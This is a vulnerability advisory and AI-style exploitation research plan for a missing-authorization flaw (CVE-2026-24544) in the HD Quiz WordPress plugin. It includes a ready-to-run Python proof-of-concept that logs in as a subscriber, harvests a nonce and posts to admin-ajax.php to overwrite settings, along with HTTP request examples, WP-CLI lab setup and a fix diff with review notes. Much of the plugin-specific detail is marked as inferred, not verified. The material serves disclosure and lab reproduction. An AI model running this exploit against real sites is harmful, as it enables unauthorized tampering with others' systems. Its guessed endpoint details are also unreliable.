CVE-2026-24544

HD Quiz <= 2.0.9 - Missing Authorization

Type: Missing Authorization
Severity: Medium
CVSS Score: 4.3
Patched in: 2.0.10
Time to patch: 7 days

Description

The HD Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 2.0.9
Published: January 24, 2026
Last updated: January 30, 2026
Affected plugin: hd-quiz

Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-24544 (HD Quiz <= 2.0.9 - Missing Authorization)

1. Vulnerability Summary

The HD Quiz plugin for WordPress (versions up to 2.0.9) suffers from a Missing Authorization vulnerability. The plugin registers several AJAX handlers intended for administrative use (such as saving quiz settings or modifying quiz data) but fails to implement a capability check (e.g., current_user_can('manage_options')) within the callback functions. This allows any authenticated user, including those with Subscriber privileges, to trigger these administrative actions, provided they can obtain a valid security nonce.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • HTTP Method: POST
  • Vulnerable Action: hdq_save_settings or hdq_save_quiz (inferred from common HD Quiz patterns).
  • Payload Parameter: action=hdq_save_settings (or similar), along with settings data and the hdq_nonce.
  • Authentication: Required (Subscriber-level or higher).
  • Precondition: The attacker must be logged in and obtain the hdq_nonce which is frequently localized for users in the admin dashboard.

3. Code Flow (Inferred)

  1. Registration: The plugin registers AJAX hooks in hd-quiz.php or includes/admin.php:
    add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );
    
  2. Missing Check: The function hdq_save_settings() (likely in includes/admin.php) is called.
  3. Execution:
    • It performs check_ajax_referer('hdq_admin_nonce', 'nonce') (or similar).
    • Crucially, it skips if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }.
    • It then processes $_POST data and updates plugin options using update_option().

4. Nonce Acquisition Strategy

In HD Quiz, nonces are typically localized using wp_localize_script for admin-side scripts. Even a Subscriber can load wp-admin/profile.php, and many plugins enqueue their admin scripts (and the nonces localized with them) on every admin screen rather than only on their own settings page. This is the precondition to confirm first: if the plugin gates the enqueue on the $hook_suffix passed to admin_enqueue_scripts so that the script only loads on its settings screen, a Subscriber never receives the nonce and the missing capability check is not reachable from that account.

  1. Identification: The plugin uses wp_localize_script to pass a nonce to JavaScript. Look for the variable name hdq_admin_vars or hdq_vars.
  2. Page Creation (If needed): If the nonce is only on specific pages, create a page with the HD Quiz shortcode:
    • wp post create --post_type=page --post_status=publish --post_content='[hdq_quiz quiz="123"]'
  3. Extraction via Browser:
    • Use browser_navigate to wp-admin/profile.php or the created quiz page.
    • Use browser_eval to extract the nonce:
      // Likely candidate for HD Quiz
      window.hdq_admin_vars?.nonce || window.hdq_vars?.nonce
      
  4. Verification: Check the source code for the exact localization key:
    • grep -r "wp_localize_script" . in the plugin directory.

5. Exploitation Strategy

We will attempt to modify the global HD Quiz settings (e.g., changing the "Results Text" or "Admin Email") which should be restricted to administrators.

Step-by-Step:

  1. Login: Authenticate as a Subscriber user.
  2. Fetch Nonce: Navigate to wp-admin/profile.php and extract the hdq_nonce from the hdq_admin_vars object.
  3. Trigger Exploit: Send a POST request to admin-ajax.php.

Example HTTP Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=hdq_save_settings&nonce=[EXTRACTED_NONCE]&hdq_twitter_handle=pwned_account&hdq_results_text=Vulnerable+to+CVE-2026-24544
    
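The login, nonce harvest and admin-ajax.php POST from steps 1 to 3 above, as an added reproduction harness. It is not code from the advisory, the research plan or the HD Quiz plugin. Everything plugin-specific in it is an assumption carried over from the plan, which itself marks these as inferred: the hdq_save_settings action, the nonce POST field, the hdq_admin_vars / hdq_vars object names and the hdq_results_text key. The HTML snippet is constructed so that the nonce extraction can be exercised offline; the network functions only run when the script is invoked directly.

```python
"""
Reproduction harness for the procedure in section 5. Added example, not code
from the advisory, the research plan or the HD Quiz plugin. The action name,
nonce field, localized-object names and option keys are ASSUMPTIONS taken
from the plan, which marks them as inferred.
"""
import http.cookiejar
import json
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

# Constructed sample of the <script> block wp_localize_script() emits into an
# admin page; it exists only so extract_nonce() can be exercised offline.
SAMPLE_ADMIN_HTML = """
<script type="text/javascript" id="hdq-admin-js-extra">
/* <![CDATA[ */
var hdq_admin_vars = {"ajaxurl":"http:\\/\\/localhost:8080\\/wp-admin\\/admin-ajax.php","nonce":"a1b2c3d4e5"};
/* ]]> */
</script>
"""

# Candidate global names from section 4 (assumed, not confirmed against the plugin).
LOCALIZED_OBJECTS = ("hdq_admin_vars", "hdq_vars")
AJAX_ACTION = "hdq_save_settings"  # inferred in section 2, not verified


def extract_nonce(html: str, names=LOCALIZED_OBJECTS) -> Optional[str]:
    """Return the nonce from the first `var <name> = {...};` blob found, else None.

    wp_localize_script() serialises with json_encode(), so the object is decoded
    as JSON rather than scraped with a looser regex.
    """
    for name in names:
        m = re.search(r"var\s+" + re.escape(name) + r"\s*=\s*(\{.*?\});", html, re.S)
        if not m:
            continue
        try:
            data = json.loads(m.group(1))
        except json.JSONDecodeError:
            continue
        nonce = data.get("nonce")
        if isinstance(nonce, str) and nonce:
            return nonce
    return None


def build_settings_payload(nonce: str, **settings) -> dict:
    """POST body for admin-ajax.php; keys beyond action/nonce are assumed option names."""
    payload = {"action": AJAX_ACTION, "nonce": nonce}
    payload.update(settings)
    return payload


def ajax_succeeded(body: str) -> bool:
    """Success is {"success":true}, a bare 1, or (per the inferred handler) the
    string "success"; admin-ajax.php's 0 / -1 and JSON {"success":false} are failures."""
    text = body.strip()
    if text in ("1", "success"):
        return True
    try:
        return bool(json.loads(text).get("success"))
    except (ValueError, AttributeError):
        return False


def _open(opener, url: str, fields: Optional[dict] = None):
    """GET when fields is None, otherwise a form-encoded POST; 4xx/5xx bodies are returned, not raised."""
    data = urllib.parse.urlencode(fields).encode() if fields is not None else None
    try:
        with opener.open(urllib.request.Request(url, data=data), timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def wp_login(base_url: str, username: str, password: str):
    """Log in through the stock wp-login.php form; returns a cookie-carrying opener."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    _open(opener, f"{base_url}/wp-login.php")  # first GET receives wordpress_test_cookie
    _open(opener, f"{base_url}/wp-login.php", {
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": f"{base_url}/wp-admin/profile.php", "testcookie": "1"})
    if not any(c.name.startswith("wordpress_logged_in_") for c in jar):
        raise RuntimeError("login failed: no wordpress_logged_in_* cookie issued")
    return opener


def run(base_url: str, username: str, password: str, marker: str):
    """Steps 1-3 of section 5 end to end; returns (status, body, succeeded)."""
    opener = wp_login(base_url, username, password)
    _, html = _open(opener, f"{base_url}/wp-admin/profile.php")
    nonce = extract_nonce(html)
    if nonce is None:
        raise RuntimeError("no nonce on profile.php; grep the plugin for wp_localize_script")
    status, body = _open(opener, f"{base_url}/wp-admin/admin-ajax.php",
                         build_settings_payload(nonce, hdq_results_text=marker))
    return status, body, ajax_succeeded(body)


if __name__ == "__main__":
    base, user, pw = sys.argv[1:4]  # e.g. http://localhost:8080 attacker password
    print(run(base, user, pw, "Vulnerable to CVE-2026-24544"))
```

Run it against the lab from section 6 as `python3 poc.py http://localhost:8080 attacker password` and then confirm with `wp option get hdq_settings` as in section 8. A `succeeded` value of False together with a body of `0` or `-1` means the action name or nonce field is wrong (admin-ajax.php returns those before the callback runs), which is the cue to fall back on the grep in section 4.
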

6. Test Data Setup

  1. Install Plugin: Ensure HD Quiz v2.0.9 is installed and active.
  2. Create Quiz: Create at least one quiz to ensure the plugin's infrastructure is initialized.
    • wp post create --post_type=hd_quiz --post_title="Test Quiz" --post_status=publish
  3. Create Attacker User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password

7. Expected Results

  • Response: The server should return a 200 OK response, often with a JSON success message like {"success": true} or simply 1.
  • Impact: The global settings for HD Quiz will be modified.

8. Verification Steps

  1. Check Options: Use WP-CLI to verify the setting was changed:
    • wp option get hdq_settings (Settings are often serialized in a single option).
    • Check for the value "Vulnerable to CVE-2026-24544".
  2. UI Verification: Log in as an Administrator and navigate to the HD Quiz Settings page to see the modified "Results Text".

9. Alternative Approaches

If hdq_save_settings is not the vulnerable hook, search for other wp_ajax_ handlers that perform data modification:

  • hdq_save_quiz: Attempt to rename a quiz.
  • hdq_delete_quiz: Attempt to delete a quiz post.
  • hdq_save_quiz_results: Attempt to inject or modify quiz result data.

Search command for the agent to find other targets:

grep -rn "add_action.*wp_ajax_" . | grep -v "nopriv"

Then check each associated function for the absence of current_user_can.

Research Findings
Static analysis — not yet PoC-verified

Summary

The HD Quiz plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in several AJAX handlers, such as 'hdq_save_settings'. This allows authenticated attackers with subscriber-level access or higher to perform administrative actions if they can obtain a valid security nonce, which is often localized for users in the admin dashboard.

Vulnerable Code

// includes/admin.php (inferred from plugin structure)
add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );

function hdq_save_settings() {
    // Nonce is checked, but capability check is missing
    check_ajax_referer('hdq_admin_nonce', 'nonce');

    // Processes $_POST data and updates options directly
    $hdq_settings = $_POST['hdq_settings'];
    update_option('hdq_settings', $hdq_settings);
    echo "success";
    die();
}

Security Fix

--- includes/admin.php
+++ includes/admin.php
@@ -1,6 +1,9 @@
 function hdq_save_settings() {
     check_ajax_referer('hdq_admin_nonce', 'nonce');
 
+    if (!current_user_can('manage_options')) {
+        wp_die(__('You do not have sufficient permissions to access this page.'));
+    }
+
     $hdq_settings = $_POST['hdq_settings'];
     update_option('hdq_settings', $hdq_settings);
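Review bot: the added current_user_can('manage_options') check closes the authorization gap, but the two context lines that follow still pass $_POST['hdq_settings'] straight into update_option() with no sanitization, so the handler accepts arbitrary nested data from any administrator session; walk the expected keys, sanitize each (sanitize_text_field / absint as appropriate) and drop unknown keys before the update_option() call. Also, wp_die() with only a message inside an admin-ajax.php handler returns HTTP 200 with an HTML body, which the JavaScript caller cannot tell apart from success; wp_send_json_error( null, 403 ) (or wp_die( '', '', array( 'response' => 403 ) )) gives the client a usable signal. Note too that the header @@ -1,6 +1,9 @@ promises six pre-image lines while only five are shown, so the hunk as pasted here is truncated.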

Exploit Outline

To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to the WordPress dashboard (e.g., wp-admin/profile.php) to extract the security nonce from the global JavaScript object 'hdq_admin_vars.nonce'. Using this nonce, the attacker sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'hdq_save_settings' and the 'nonce' parameter set to the extracted value. By including additional POST parameters corresponding to HD Quiz configuration options (like 'hdq_results_text'), the attacker can overwrite global plugin settings without having administrator privileges.
